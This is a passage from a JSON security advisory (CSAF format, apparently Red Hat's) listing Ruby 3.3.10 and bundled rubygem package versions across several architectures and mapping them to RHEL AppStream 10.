"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product_id": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"product_id": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"product": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-12.el10_1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-12.el10_1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-12.el10_1.s390x",
"product": {
"name": "ruby-0:3.3.10-12.el10_1.s390x",
"product_id": "ruby-0:3.3.10-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"product_id": "ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-12.el10_1.s390x",
"product": {
"name": "ruby-devel-0:3.3.10-12.el10_1.s390x",
"product_id": "ruby-devel-0:3.3.10-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-12.el10_1.s390x",
"product": {
"name": "ruby-libs-0:3.3.10-12.el10_1.s390x",
"product_id": "ruby-libs-0:3.3.10-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"product_id": "rubygem-bigdecimal-0:3.1.5-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"product": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"product_id": "rubygem-io-console-0:0.7.1-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-12.el10_1.s390x",
"product": {
"name": "rubygem-json-0:2.7.2-12.el10_1.s390x",
"product_id": "rubygem-json-0:2.7.2-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-12.el10_1.s390x",
"product": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.s390x",
"product_id": "rubygem-psych-0:5.1.2-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-0:1.7.3-12.el10_1.s390x",
"product": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.s390x",
"product_id": "rubygem-racc-0:1.7.3-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"product": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"product_id": "rubygem-rbs-0:3.4.0-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"product": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"product_id": "ruby-debugsource-0:3.3.10-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"product": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"product_id": "ruby-debuginfo-0:3.3.10-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"product_id": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"product_id": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"product": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-12.el10_1?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-12.el10_1?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-0:3.3.10-12.el10_1.x86_64",
"product": {
"name": "ruby-0:3.3.10-12.el10_1.x86_64",
"product_id": "ruby-0:3.3.10-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby@3.3.10-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"product": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"product_id": "ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems@3.3.10-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-devel-0:3.3.10-12.el10_1.x86_64",
"product": {
"name": "ruby-devel-0:3.3.10-12.el10_1.x86_64",
"product_id": "ruby-devel-0:3.3.10-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-devel@3.3.10-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-0:3.3.10-12.el10_1.x86_64",
"product": {
"name": "ruby-libs-0:3.3.10-12.el10_1.x86_64",
"product_id": "ruby-libs-0:3.3.10-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs@3.3.10-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"product": {
"name": "rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"product_id": "rubygem-bigdecimal-0:3.1.5-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal@3.1.5-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"product": {
"name": "rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"product_id": "rubygem-io-console-0:0.7.1-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console@0.7.1-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-0:2.7.2-12.el10_1.x86_64",
"product": {
"name": "rubygem-json-0:2.7.2-12.el10_1.x86_64",
"product_id": "rubygem-json-0:2.7.2-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json@2.7.2-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"product": {
"name": "rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"product_id": "rubygem-psych-0:5.1.2-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych@5.1.2-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"product": {
"name": "rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"product_id": "rubygem-racc-0:1.7.3-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc@1.7.3-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"product": {
"name": "rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"product_id": "rubygem-rbs-0:3.4.0-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs@3.4.0-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"product": {
"name": "ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"product_id": "ruby-debugsource-0:3.3.10-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debugsource@3.3.10-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product_id": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-bundled-gems-debuginfo@3.3.10-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product_id": "ruby-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-debuginfo@3.3.10-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product": {
"name": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product_id": "ruby-libs-debuginfo-0:3.3.10-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-libs-debuginfo@3.3.10-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"product": {
"name": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"product_id": "rubygem-bigdecimal-debuginfo-0:3.1.5-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bigdecimal-debuginfo@3.1.5-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"product": {
"name": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"product_id": "rubygem-io-console-debuginfo-0:0.7.1-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-io-console-debuginfo@0.7.1-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"product": {
"name": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"product_id": "rubygem-json-debuginfo-0:2.7.2-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-json-debuginfo@2.7.2-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"product": {
"name": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"product_id": "rubygem-psych-debuginfo-0:5.1.2-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-psych-debuginfo@5.1.2-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"product": {
"name": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"product_id": "rubygem-racc-debuginfo-0:1.7.3-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-racc-debuginfo@1.7.3-12.el10_1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"product": {
"name": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"product_id": "rubygem-rbs-debuginfo-0:3.4.0-12.el10_1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rbs-debuginfo@3.4.0-12.el10_1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_version",
"name": "ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"product": {
"name": "ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"product_id": "ruby-default-gems-0:3.3.10-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-default-gems@3.3.10-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"product": {
"name": "rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"product_id": "rubygem-bundler-0:2.5.22-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-bundler@2.5.22-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-irb-0:1.13.1-12.el10_1.noarch",
"product": {
"name": "rubygem-irb-0:1.13.1-12.el10_1.noarch",
"product_id": "rubygem-irb-0:1.13.1-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-irb@1.13.1-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"product": {
"name": "rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"product_id": "rubygem-minitest-0:5.20.0-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-minitest@5.20.0-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"product": {
"name": "rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"product_id": "rubygem-power_assert-0:2.0.3-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-power_assert@2.0.3-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rake-0:13.1.0-12.el10_1.noarch",
"product": {
"name": "rubygem-rake-0:13.1.0-12.el10_1.noarch",
"product_id": "rubygem-rake-0:13.1.0-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rake@13.1.0-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"product": {
"name": "rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"product_id": "rubygem-rdoc-0:6.6.3.1-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rdoc@6.6.3.1-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"product": {
"name": "rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"product_id": "rubygem-rexml-0:3.4.4-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rexml@3.4.4-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-rss-0:0.3.1-12.el10_1.noarch",
"product": {
"name": "rubygem-rss-0:0.3.1-12.el10_1.noarch",
"product_id": "rubygem-rss-0:0.3.1-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-rss@0.3.1-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"product": {
"name": "rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"product_id": "rubygem-test-unit-0:3.6.1-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-test-unit@3.6.1-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"product": {
"name": "rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"product_id": "rubygem-typeprof-0:0.21.9-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygem-typeprof@0.21.9-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygems-0:3.5.22-12.el10_1.noarch",
"product": {
"name": "rubygems-0:3.5.22-12.el10_1.noarch",
"product_id": "rubygems-0:3.5.22-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygems@3.5.22-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "rubygems-devel-0:3.5.22-12.el10_1.noarch",
"product": {
"name": "rubygems-devel-0:3.5.22-12.el10_1.noarch",
"product_id": "rubygems-devel-0:3.5.22-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/rubygems-devel@3.5.22-12.el10_1?arch=noarch"
}
}
},
{
"category": "product_version",
"name": "ruby-doc-0:3.3.10-12.el10_1.noarch",
"product": {
"name": "ruby-doc-0:3.3.10-12.el10_1.noarch",
"product_id": "ruby-doc-0:3.3.10-12.el10_1.noarch",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/ruby-doc@3.3.10-12.el10_1?arch=noarch"
}
}
}
],
"category": "architecture",
"name": "noarch"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.src as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.src"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.src",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-bundled-gems-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.s390x",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64"
},
"product_reference": "ruby-bundled-gems-debuginfo-0:3.3.10-12.el10_1.x86_64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.aarch64 as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.aarch64"
},
"product_reference": "ruby-debuginfo-0:3.3.10-12.el10_1.aarch64",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le"
},
"product_reference": "ruby-debuginfo-0:3.3.10-12.el10_1.ppc64le",
"relates_to_product_reference": "AppStream-10.1.Z"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ruby-debuginfo-0:3.3.10-12.el10_1.s390x as a component of Red Hat Enterprise Linux AppStream (v. 10)",
"product_id": "AppStream-10.1.Z:ruby-debuginfo-0:3.3.10-12.el10_1.s390x"
},
